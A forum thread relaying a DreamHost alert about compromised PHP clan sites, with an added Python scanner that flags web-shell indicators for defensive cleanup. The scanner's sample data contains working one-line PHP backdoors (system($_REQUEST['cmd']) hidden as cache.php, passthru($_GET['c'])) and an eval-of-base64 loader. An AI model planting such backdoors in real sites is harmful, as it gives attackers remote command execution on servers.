OUR SITES WERE HACKED!
[nicode 33797247] DreamHost Security Alert - Compromised User
From: DreamHost Security Bot <secalerts@dreamhost.com>
To: http://www.40calgames.com
--------------------------------------------------------------------------------
We have noticed hacked processes running under your fortycal user that are indicative of PHP web software installations being hacked. To keep your site and the server secure I have disabled the following domain directories by renaming the domain directory to end in "_DISABLED" -- please do NOT reinstate the domain until you have thoroughly executed the instructions below:
/home/fortycal/cswargames.com
/home/fortycal/furyclan.com
/home/fortycal/on24cstrike.com
/home/fortycal/reignclan.com
/home/fortycal/cswraith.com
/home/fortycal/cswarlords.com
/home/fortycal/40calgames.com
Most commonly hacking exploits of this nature occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains. To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor. The following site can help you determine if you're running a vulnerable version:
http://secunia.com/advisories/search/
- phpBB installations should be updated to the current secure release of 3.0.6 or the legacy release 2.0.23.
- Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for other vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory. Also make sure to check ALL of your web software packages (even those not listed) as we are not able to check for everything automatically.
2) Check your software control panel for outdated or unauthorized plugins/mods/components/etc. if applicable. Some exploits can add new plugins/components that continue the infection even if you've updated the core software version. Some plugins can themselves be the source of vulnerability, so it's a good idea to ensure you've got the latest versions possible.
3) Go through all files under the affected user and look for anything that may have been modified or placed by the hacker. It is common for the intruder to place extra <?php> blocks (this is VERY common with these ZenCart hacks!), iframes, javascript <script> tags, etc., frequently at the top or bottom of otherwise legitimate files. Oftentimes this code is obfuscated or encoded such that you cannot tell what it does simply by reading it. Also note that hackers often leave behind shell/backdoor scripts that they can later use to re-exploit the site even after all other vulnerabilities have been patched. Often these scripts are given innocuous names like "cache.php" or "template.php", or they may be more conspicuous nonsense names or include red flag words like 'shell'.
More general information on this topic is available at the following URL:
http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites
If you have any questions, please respond directly to this email.
Thank you for your cooperation!
-Happy DreamHost Security Bot
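Step 3 of the alert is a manual sweep of the whole home directory. The script below is an added example (my own illustration, not DreamHost's scanner or anything shipped with phpBB or ZenCart) that automates the first pass: it walks a copy of the files and flags the indicators the alert names, namely eval() of a base64/gzinflate-decoded payload, request parameters fed straight into system()/passthru()/eval(), long base64 literals, hidden iframes, PHP open tags inside .js/.html/.css files, file names containing "shell", nonsense alphanumeric names, and recent modification. Every regex, extension list and the 7-day window are assumptions chosen for illustration, not a vendor signature set, and the sample site tree it builds is constructed for the demo, not taken from the affected account.

```python
"""Sweep a web-hosting home directory for the indicators in the alert's step 3.

Added example, not DreamHost's scanner: a heuristic triage pass over a copy of
the user's files. Every regex, extension list and threshold is an assumption
chosen for illustration; hits are leads to inspect by hand, and legitimate
files (minified JS, base64-encoded images) will sometimes trigger them.
"""
import os
import re
import tempfile
import time

WEB_TEXT_EXT = {".php", ".phtml", ".inc", ".html", ".htm", ".js", ".css", ".txt", ".tpl"}
NON_PHP_EXT = WEB_TEXT_EXT - {".php", ".phtml", ".inc"}

# Content indicators (assumed heuristics). The labels are what the report prints.
CONTENT_PATTERNS = {
    "eval-of-decoded-payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I),
    "request-input-to-exec": re.compile(
        r"\b(?:system|passthru|shell_exec|exec|popen|proc_open|eval|assert)\s*\("
        r"\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "preg_replace-e-modifier": re.compile(
        r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I | re.S),
    "long-base64-literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "hidden-iframe": re.compile(
        r"<iframe\b[^>]*(?:\b(?:width|height)\s*=\s*['\"]?0\b|display\s*:\s*none)", re.I),
}
PHP_OPEN_TAG = re.compile(r"<\?php\b|<\?=", re.I)
# "nonsense" name: 6+ alphanumerics, at least two digits, no vowels (assumed heuristic)
NONSENSE_NAME = re.compile(r"^(?=(?:[a-z]*\d){2})(?![a-z0-9]*[aeiou])[a-z0-9]{6,}\.php$", re.I)


def scan_file(path, now, recent_days):
    """Return the sorted indicator labels that fire for one file ([] if clean)."""
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    hits = []
    if "shell" in name.lower():
        hits.append("red-flag-name")
    if NONSENSE_NAME.match(name):
        hits.append("nonsense-name")
    if ext in WEB_TEXT_EXT:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        hits += [label for label, rx in CONTENT_PATTERNS.items() if rx.search(text)]
        if ext in NON_PHP_EXT and PHP_OPEN_TAG.search(text):
            hits.append("php-tag-in-non-php-file")
        # mtime is a triage aid only: a backdoor whose timestamp was reset still
        # has to be caught by its content (see cache.php in the sample tree)
        if now - os.path.getmtime(path) < recent_days * 86400:
            hits.append("modified-recently")
    return sorted(hits)


def scan_tree(root, recent_days=7, now=None):
    """Walk root and return {relative path: [indicators]} for files with any hit."""
    now = time.time() if now is None else now
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            hits = scan_file(full, now, recent_days)
            if hits:
                report[os.path.relpath(full, root).replace(os.sep, "/")] = hits
    return report


# Constructed sample tree: (content, days since last modification). Not real site files.
SAMPLE_FILES = {
    "forum/index.php": ("<?php\ndefine('IN_PHPBB', true);\ninclude 'common.php';\n", 120),
    "forum/viewtopic.php": (  # legitimate file with an injected block prepended
        "<?php eval(base64_decode('" + "QUJD" * 60 + "')); ?>\n<?php\ninclude 'common.php';\n", 2),
    "forum/cache.php": (  # backdoor under an innocuous name, timestamp set back
        "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>\n", 90),
    "forum/includes/shell.php": ("<?php passthru($_GET['c']); ?>\n", 2),
    "gallery/images/x7q2k9.php": ("<?php @eval(gzinflate(base64_decode($x))); ?>\n", 1),
    "index.html": ("<html><body>Clan home</body></html>\n"
                   '<iframe src="http://example.invalid/" width="0" height="0"></iframe>\n', 3),
    "js/footer.js": ("<?php include('/tmp/.x'); ?>\nfunction f() {}\n", 3),
}


def build_sample_tree(base, now):
    """Write SAMPLE_FILES under base with the stated modification ages."""
    for rel, (content, age_days) in SAMPLE_FILES.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
        stamp = now - age_days * 86400
        os.utime(full, (stamp, stamp))


def scan_sample():
    """Build the constructed sample tree in a temp directory and scan it."""
    now = time.time()
    base = tempfile.mkdtemp(prefix="hacked-site-sample-")
    build_sample_tree(base, now)
    return scan_tree(base, recent_days=7, now=now)


if __name__ == "__main__":
    import sys
    report = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_sample()
    for rel, hits in sorted(report.items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it with no arguments to see the sample report, or pass the path of a copy of the home directory to sweep real files. The one finding worth noting in the sample is cache.php: its timestamp was set back 90 days, so a find -mtime style check alone would miss it, and only the content rule catches it. Treat the output as a list of files to read, not a verdict; the reliable check for a packaged application is still to diff the install against a fresh download of the same version from the vendor and delete everything that is not in it.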
Re: OUR SITES WERE HACKED!
after 8 hours of following the instructions....we're back guys!
sammy
Re: OUR SITES WERE HACKED!
Does this mean I need to change my password?
Re: OUR SITES WERE HACKED!
Belcross wrote:
> Does this mean I need to change my password?

No.. it had nothing to do with you!
Re: OUR SITES WERE HACKED!
Thank you sammy!
Re: OUR SITES WERE HACKED!
Thanks Sammy for staying on top of this and keeping us up and running.
Greed will always make you poorer!
Never measure the height of a mountain until you have reached the top. Then you will see how low it was!
Re: OUR SITES WERE HACKED!
If you have the IP of the hacker, use your breadstick.
Re: OUR SITES WERE HACKED!
ahh nice
updated to 3.0.7
Re: OUR SITES WERE HACKED!
> I have deleted the files that you claim as being compromised. But how will I
> know if they are all now safe?
> I renamed my forum directories back to normal. All seems to be working fine.
> sammy
>
Dreamhost wrote:
A great tool to double-check if there are any lingering problems can be
found online at http://unmaskparasites.com
I did my own scan for known backdoor shells and did not see any under
your file space.
Glen,
--
- DreamHost Abuse/Security Team
- Terms of Service: http://www.dreamhost.com/tos.html
- Anti-Spam Policy: http://www.dreamhost.com/spam.html
- Abuse Center: http://abuse.dreamhost.com
looks like we're good to go!
sammy